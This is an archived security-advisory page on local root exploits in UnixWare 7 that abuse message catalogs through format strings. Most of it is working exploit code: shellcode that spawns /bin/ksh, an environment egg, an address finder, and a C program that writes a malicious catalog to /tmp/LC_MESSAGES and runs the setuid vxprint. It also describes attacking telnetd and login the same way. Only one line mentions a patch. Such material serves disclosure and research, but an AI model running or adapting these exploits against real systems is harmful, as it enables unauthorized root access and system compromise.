TUCoPS :: SCO :: sco5088.htm

Unixware Message catalog exploit
12th Feb 2002 [SBWID-5088]
COMMAND

	Unixware Message catalog exploit

SYSTEMS AFFECTED

	Unixware 7.x

PROBLEM

	jGgM posted  multiple  UnixWare  7  root  exploits  based  on  \"message
	catalog\" :
	

	Hacker can modify message catalog and can build format string exploit.
	

	 Exploit :

	 =======

	

	$ gcc -o expshell expshell.c

	$ gcc -o getret getret.c

	$ gcc -o fmt_exp fmt_exp.c

	$ ./expshell

	$ ./getret

	e=8047af7

	$ ./fmt_exp 0x8047af7  16 ( 16 is offset )

	...........(wait 30 minutes ). ......

	

	# id

	uid=0(root) gid=3(sys) ......................

	

	

	This can exploit all of unixware 7 setuid/setgid command.
	

	Also, can exploit telnetd and login :
	

	

	$ telnet

	telnet> env def LC_MESSAGES /tmp

	telnet> o localhost

	Trying....

	.....

	login: blah blah..

	password: blah.. blash..

	...... (wait 30 minutes.. )

	# 

	

	

	Here is the code.
	

	

	------------------ expshell.c ------------------

	#include <stdio.h>

	

	char shellcode[]=

	    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	    \"\\xeb\\x1a\"             /* jmp     <shellcode+28>         */

	    \"\\x33\\xd2\"             /* xorl    %edx,%edx              */

	    \"\\x58\"                 /* popl    %eax                   */

	    \"\\x8d\\x78\\x14\"         /* leal    0x14(%eax),%edi        */

	    \"\\x57\"                 /* pushl   %edi                   */

	    \"\\x50\"                 /* pushl   %eax                   */

	    \"\\xab\"                 /* stosl   %eax,%es:(%edi)        */

	    \"\\x92\"                 /* xchgl   %eax,%edx              */

	    \"\\xab\"                 /* stosl   %eax,%es:(%edi)        */

	    \"\\x88\\x42\\x08\"         /* movb    %al,0x8(%edx)          

	*/

	    \"\\x83\\xef\\x3b\"         /* subl    $0x3b,%edi             */

	    \"\\xb0\\x9a\"             /* movb    $0x9a,%al              */

	    \"\\xab\"                 /* stosl   %eax,%es:(%edi)        */

	    \"\\x47\"                 /* incl    %edi                   */

	    \"\\xb0\\x07\"             /* movb    $0x07,%al              */

	    \"\\xab\"                 /* stosl   %eax,%es:(%edi)        */

	    \"\\xb0\\x0b\"             /* movb    $0x0b,%al              */

	    \"\\xe8\\xe1\\xff\\xff\\xff\" /* call    <shellcode+2>          */

	    \"/bin/ksh\"

	;

	

	main(int argc, char *argv[])

	{

	   char buff[1024];

	

	   sprintf(buff, \"EGG=%s\", shellcode);

	   putenv(buff);

	

	   putenv(\"LC_MESSAGES=/tmp\");

	   system(\"/usr/bin/tcsh\");

	}

	---------------------------------------------------------------

	

	

	

	---------------- getret.c --------------------

	main()

	 {

	 char *a;

	 a = getenv(\"EGG\");

	 printf (\"e=%p\\n\", a);

	 }

	-----------------------------------------------

	

	

	

	---------------- fmt_exp.c -----------------------------

	#include <stdio.h>

	#include \"shellcode.h\"

	

	/* This is base of format string return address */

	/* Base address of vxprint is 0x20c7c(134268) */

	#define BASE 134268

	

	main(int argc, char *argv[])

	{

	   FILE *fp;

	   char *retaddr;

	   long g_len, offset;

	   int count, count2, line=700, n=19;

	

	   if(argc < 2 || argc > 3) {

	      printf(\"Usage: %s ret-address offset\\n\", argv[0]);

	      exit(1);

	   }

	

	   retaddr = argv[1];

	   if(argc == 3) offset = atol(argv[2]);

	   else offset = 0;

	

	   g_len = strtol(retaddr, NULL, 16);

	   g_len -= BASE;

	   g_len += offset;

	

	   fp = fopen(\"testdef\", \"w+\");

	   if(fp == NULL) {

	      fprintf(stderr, \"can not open file.\\n\"); exit(1);

	   }

	   for(count=0; count<line; count++) {

	      for(count2=0; count2<n; count2++)

	         fprintf(fp, \"%%10x\");

	      fprintf(fp, \"%%%dx%%n\\n\", g_len);

	   }

	   fclose(fp);

	

	   remove(\"testout\");

	   system(\"mkmsgs testdef testout\");

	   mkdir(\"/tmp/LC_MESSAGES\", 0755);

	   system(\"mv 

	testout /tmp/LC_MESSAGES/vxvm.mesg\");

	

	   printf(\"ret addr = 0x%x\\n\", g_len);

	   /* this, also can any set uid command */

	   execl(\"/usr/sbin/vxprint\", \"vxprint\", \"---\", NULL);

	}

	

	

SOLUTION

	Caldera has posted a patch. See caldera support.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH